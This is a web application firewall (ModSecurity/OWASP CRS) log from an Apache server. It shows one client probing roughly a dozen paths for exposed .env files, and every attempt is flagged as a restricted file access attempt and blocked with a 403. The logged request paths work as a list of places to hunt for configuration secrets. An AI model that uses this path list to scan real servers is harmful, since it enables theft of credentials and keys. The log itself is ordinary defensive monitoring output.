[Mon May 11 18:03:17.560574 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/v1/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh0wAAAQQ"]
[Mon May 11 18:03:17.560805 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/v1/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh0wAAAQQ"]
[Mon May 11 18:03:17.561079 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xUWKUxpmnkK7zHyh0wAAAQQ"]
[Mon May 11 18:03:17.727040 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/v2/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh1AAAAQQ"]
[Mon May 11 18:03:17.727277 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/v2/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh1AAAAQQ"]
[Mon May 11 18:03:17.727580 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xUWKUxpmnkK7zHyh1AAAAQQ"]
[Mon May 11 18:03:17.926497 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/rest/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh1QAAAQQ"]
[Mon May 11 18:03:17.926746 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/rest/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh1QAAAQQ"]
[Mon May 11 18:03:17.927106 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xUWKUxpmnkK7zHyh1QAAAQQ"]
[Mon May 11 18:03:18.227396 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/graphql/.env"] [unique_id "agH9xkWKUxpmnkK7zHyh1wAAAQQ"]
[Mon May 11 18:03:18.227637 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/graphql/.env"] [unique_id "agH9xkWKUxpmnkK7zHyh1wAAAQQ"]
[Mon May 11 18:03:18.227936 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xkWKUxpmnkK7zHyh1wAAAQQ"]
[Mon May 11 18:03:18.400462 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/gateway/.env"] [unique_id "agH9xkWKUxpmnkK7zHyh2AAAAQQ"]
[Mon May 11 18:03:18.400691 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/gateway/.env"] [unique_id "agH9xkWKUxpmnkK7zHyh2AAAAQQ"]
[Mon May 11 18:03:18.400983 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xkWKUxpmnkK7zHyh2AAAAQQ"]
[Mon May 11 18:03:18.562982 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/microservice/.env"] [unique_id "agH9xkWKUxpmnkK7zHyh2gAAAQQ"]
[Mon May 11 18:03:18.563229 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/microservice/.env"] [unique_id "agH9xkWKUxpmnkK7zHyh2gAAAQQ"]
[Mon May 11 18:03:18.563530 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xkWKUxpmnkK7zHyh2gAAAQQ"]
[Mon May 11 18:03:19.111133 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/service/.env"] [unique_id "agH9x0WKUxpmnkK7zHyh2wAAAQQ"]
[Mon May 11 18:03:19.111380 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/service/.env"] [unique_id "agH9x0WKUxpmnkK7zHyh2wAAAQQ"]
[Mon May 11 18:03:19.111713 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9x0WKUxpmnkK7zHyh2wAAAQQ"]
[Mon May 11 18:03:19.267556 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/v3/.env"] [unique_id "agH9x0WKUxpmnkK7zHyh3AAAAQQ"]
[Mon May 11 18:03:19.267834 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/v3/.env"] [unique_id "agH9x0WKUxpmnkK7zHyh3AAAAQQ"]
[Mon May 11 18:03:19.268135 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9x0WKUxpmnkK7zHyh3AAAAQQ"]
[Mon May 11 18:03:19.431933 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/dev/.env"] [unique_id "agH9x0WKUxpmnkK7zHyh3gAAAQQ"]
[Mon May 11 18:03:19.432171 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/dev/.env"] [unique_id "agH9x0WKUxpmnkK7zHyh3gAAAQQ"]
[Mon May 11 18:03:19.432447 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9x0WKUxpmnkK7zHyh3gAAAQQ"]
[Mon May 11 18:03:20.033976 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/staging/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh3wAAAQ4"]
[Mon May 11 18:03:20.034234 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/staging/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh3wAAAQ4"]
[Mon May 11 18:03:20.034741 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yEWKUxpmnkK7zHyh3wAAAQ4"]
[Mon May 11 18:03:20.214286 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/vendor/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh4QAAAQ4"]
[Mon May 11 18:03:20.214523 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/vendor/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh4QAAAQ4"]
[Mon May 11 18:03:20.214804 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yEWKUxpmnkK7zHyh4QAAAQ4"]
[Mon May 11 18:03:20.422541 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/lib/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh4gAAAQ4"]
[Mon May 11 18:03:20.422762 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/lib/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh4gAAAQ4"]
[Mon May 11 18:03:20.423037 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yEWKUxpmnkK7zHyh4gAAAQ4"]
[Mon May 11 18:03:20.627931 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/resources/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh4wAAAQ4"]
[Mon May 11 18:03:20.628180 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/resources/.env"] [unique_id "agH9yEWKUxpmnkK7zHyh4wAAAQ4"]
[Mon May 11 18:03:20.628488 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9yEWKUxpmnkK7zHyh4wAAAQ4"]
